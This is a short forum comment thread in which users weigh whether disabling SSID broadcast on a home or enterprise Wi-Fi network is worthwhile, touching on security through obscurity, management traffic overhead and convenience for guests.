I used to set my SSID at home to not broadcast, then one day a new laptop with a built-in Intel wireless adapter found my home network anyway. After that, I figured, "why bother", as it was a PITA to deal with when friends or relatives came over with adapters that could not see the network without the broadcast.

Michael Kassner

It is interesting, as I rarely think along those lines. I normally just assume that what is good for enterprise will be the best for the home network as well. I must admit that I am re-evaluating that point of view, as it may be skewed. First, I refuse to subscribe to the "security through obscurity" mantra on any level. Then, after I weigh the advantages against the disadvantages of each approach, my opinion is that network efficiency is more important, especially since it is so easy to resolve what the SSID is. I wish more people would take the time to run a packet analyzer. The increase in network management traffic is quite significant.

seanferd

I've never even considered the factors involved in a larger network environment. I'm curious as to what your take is on SSID broadcasting or not for home users, particularly those with very small networks. Especially a one wirelessly connected PC setup. For now, I'm assuming that the "Hey! I'm your base" argument still holds up.
